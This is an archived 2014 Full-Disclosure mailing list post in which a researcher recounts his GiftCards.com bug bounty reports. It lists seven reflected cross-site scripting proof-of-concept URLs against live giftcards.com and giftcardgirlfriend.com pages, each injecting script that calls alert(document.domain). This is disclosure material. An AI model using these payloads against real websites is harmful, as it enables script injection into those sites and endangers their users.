lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <5302FA0E.7060501@t-online.de>
Date: Tue, 18 Feb 2014 07:13:34 +0100
From: Stefan Schurtz <sschurtz@...nline.de>
To: full-disclosure@...ts.grok.org.uk
Subject: My experiences with the GiftCards.com Bug Bounty
	Program

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Since November 2013 I reported seven Cross-site Scripting
vulnerabilities to the Giftcard Bug Bounty Program. Sadly, only one of
them wasn't a duplicate :-/. Strange? Perhaps, but not impossible
given the simplicity of the vulnerabilities.

But what I really don't understand: Why do they still work until today?

######################################
# 11/17/2013 Vulnerability #1: (DUP) #
######################################

// Reflected Cross-site Scripting

http://www.giftcardgirlfriend.com/wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(document.domain)}//

// Original advisory

http://insight-labs.org/?p=738

Screenshot:

http://darksecurity.de/advisories/BugBounty/giftcards/player.swf-Sourcecode-Giftcardgirlfriend.com.JPG

#########################################################
# 11/17/2013 Vulnerability #2: - OK - Reward or not ;-) #
#########################################################

// Reflected Cross-site Scripting (tested with FF 25.0.1)

http://www.giftcardgirlfriend.com/wp-includes/js/swfupload/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.domain);//

// Original Advisory

http://inj3ct0rs.com/exploit/description/19711

Screenshots:

http://darksecurity.de/advisories/BugBounty/giftcards/Wordpress-Version-SourceCode-giftcardgirlfriend.com.JPG

http://darksecurity.de/advisories/BugBounty/giftcards/XSS-swfupload-giftcardgirlfriend.com.JPG

######################################
# 11/21/2013 Vulnerability #3: (DUP) #
######################################

// Reflected Cross-site Scripting with SWF-Files (tested on Firefox
25.0.1)

http://www.giftcards.com/swf/elf.swf?va_link=javascript:alert(document.domain);
http://www.giftcards.com/swf/santa-sample.swf?va_link=javascript:alert(document.domain);

Screenshots:

http://darksecurity.de/advisories/BugBounty/giftcards/XSS-SWFFiles-Giftcards.JPG

http://darksecurity.de/advisories/BugBounty/giftcards/SWFScan-Screenshot.JPG

######################################
# 11/26/2013 Vulnerability #4: (DUP) #
######################################

// Reflected Cross-site Scripting with IE10

https://www.giftcards.com/order-status?%00"><script>alert(document.domain)</script>

Screenshot:

http://darksecurity.de/advisories/BugBounty/giftcards/XSS-OrderStatus-Giftcards.com.JPG

################################
# 12/05/2013 Vulnerability #5: #
################################

// Reflected Cross-site Scripting with IE10

https://www.giftcards.com/signup?%00"><script>alert(document.domain)</script>

Screenshot:

http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Signup-Giftcards.com.JPG

################################
# 12/05/2013 Vulnerability #6: #
################################

// Reflected Cross-site Scripting with IE10

https://www.giftcards.com/member?%00"><script>alert(document.domain)</script>

Screenshot:

http://darksecurity.de/advisories/BugBounty/giftcards/XSS-Member-Giftcards.com.JPG

################################
# 12/05/2013 Vulnerability #7: #
################################

// Reflected Cross-site Scripting with IE10

http://www.giftcards.com/group-gifts/create/new?%00"><script>alert(document.domain)</script>

Screenshot:

http://darksecurity.de/advisories/BugBounty/giftcards/XSS-GroupGifts-Giftcards.com.JPG


Cheers,
sschurtz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlMC+gUACgkQg3svV2LcbMAVOQCePRZ4zb2nhf+6UowoxtTbkb1s
8wIAmQG/BGuP6kNdni4vaae4x0mhPn3P
=SZx4
-----END PGP SIGNATURE-----

Download attachment "0x62DC6CC0.asc" of type "application/pgp-keys" (1800 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ